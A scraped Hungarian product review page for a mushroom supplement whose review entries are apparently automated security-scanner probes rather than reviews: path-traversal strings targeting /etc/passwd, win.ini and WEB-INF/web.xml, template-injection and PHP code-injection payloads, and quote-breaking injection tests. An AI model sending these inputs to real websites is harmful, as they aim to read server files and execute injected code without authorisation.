memkqgib 2020-08-15 18:54:20
Értékelés:
1
C:\WINDOWS\system32\drivers\etc\hosts 2020-08-15 18:54:18
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:54:18
Értékelés:
\
memkqgib 2020-08-15 18:54:15
Értékelés:
1'"
../../../../../../../../../../windows/win.ini 2020-08-15 18:54:14
Értékelés:
Írj véleményt a termékről!
WEB-INF\web.xml 2020-08-15 18:54:11
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:54:10
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
vlllnxif 2020-08-15 18:54:09
Értékelés:
Írj véleményt a termékről!
/WEB-INF/web.xml 2020-08-15 18:54:08
Értékelés:
Írj véleményt a termékről!
oovclidx 2020-08-15 18:54:06
Értékelés:
Írj véleményt a termékről!
WEB-INF/web.xml 2020-08-15 18:54:04
Értékelés:
Írj véleményt a termékről!
oovclidx 2020-08-15 18:54:01
Értékelés:
Írj véleményt a termékről!
{{10000144*10000315}} 2020-08-15 18:54:00
Értékelés:
Írj véleményt a termékről!
/\../\../\../\../\../\../\../etc/passwd 2020-08-15 18:53:59
Értékelés:
Írj véleményt a termékről!
file:///etc/passwd 2020-08-15 18:53:57
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:53:52
Értékelés:
Írj véleményt a termékről!
.. 2020-08-15 18:53:52
Értékelés:
Írj véleményt a termékről!
acux10811 2020-08-15 18:53:47
Értékelés:
Írj véleményt a termékről!
%2fetc%2fpasswd 2020-08-15 18:53:42
Értékelés:
Írj véleményt a termékről!
/etc/passwd 2020-08-15 18:53:41
Értékelés:
Írj véleményt a termékről!
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 2020-08-15 18:53:39
Értékelés:
Írj véleményt a termékről!
acu9274<s1﹥s2ʺs3ʹuca9274 2020-08-15 18:53:38
Értékelés:
Írj véleményt a termékről!
qaxtjruq 2020-08-15 18:53:38
Értékelés:
${@print(md5(acunetix_wvs_security_test))}\
qaxtjruq 2020-08-15 18:53:37
Értékelés:
${@print(md5(acunetix_wvs_security_test))}
qaxtjruq 2020-08-15 18:53:35
Értékelés:
";print(md5(acunetix_wvs_security_test));$a="
qaxtjruq 2020-08-15 18:53:33
Értékelés:
';print(md5(acunetix_wvs_security_test));$a='
memkqgib 2020-08-15 18:53:32
Értékelés:
Írj véleményt a termékről!
mxrifjcb9540271 2020-08-15 18:53:31
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../etc/passwd.jpg 2020-08-15 18:53:30
Értékelés:
Írj véleményt a termékről!
qaxtjruq 2020-08-15 18:53:29
Értékelés:
;print(md5(acunetix_wvs_security_test));
2020-08-15 18:53:29
Értékelés:
Írj véleményt a termékről!
mxrifjcb'"()&% 2020-08-15 18:53:26
Értékelés:
Írj véleményt a termékről!
2020-08-15 18:53:26
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../etc/passwd 2020-08-15 18:53:24
Értékelés:
Írj véleményt a termékről!
JyI= 2020-08-15 18:53:24
Értékelés:
Írj véleményt a termékről!
jnuiqodv 2020-08-15 18:53:23
Értékelés:
<!--
oiamknew 2020-08-15 18:53:22
Értékelés:
Írj véleményt a termékről!
mxrifjcb 2020-08-15 18:53:21
Értékelés:
Írj véleményt a termékről!
@@ZRc9X 2020-08-15 18:53:21
Értékelés:
Írj véleményt a termékről!
jnuiqodv 2020-08-15 18:53:20
Értékelés:
'"
oiamknew 2020-08-15 18:53:19
Értékelés:
Írj véleményt a termékről!
1 2020-08-15 18:53:18
Értékelés:
Írj véleményt a termékről!
vmcvpgrn 2020-08-15 18:53:17
Értékelés:
sun-agaric---agaricus-blazeii/.
oiamknew 2020-08-15 18:53:16
Értékelés:
Írj véleményt a termékről!
mxrifjcb 2020-08-15 18:53:16
Értékelés:
Írj véleményt a termékről!
vmcvpgrn 2020-08-15 18:53:15
Értékelés:
sun-agaric---agaricus-blazeii
oiamknew 2020-08-15 18:53:12
Értékelés:
Írj véleményt a termékről!
vmcvpgrn 2020-08-15 18:53:11
Értékelés:
sun-agaric---agaricus-blazeii
\ 2020-08-15 18:53:11
Értékelés:
Írj véleményt a termékről!
oiamknew 2020-08-15 18:53:09
Értékelés:
Írj véleményt a termékről!
vmcvpgrn 2020-08-15 18:53:09
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
1'" 2020-08-15 18:53:09
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:53:06
Értékelés:
Írj véleményt a termékről!
oiamknew 2020-08-15 18:53:04
Értékelés:
Írj véleményt a termékről!
memkqgib 2020-08-15 18:53:03
Értékelés:
Írj véleményt a termékről!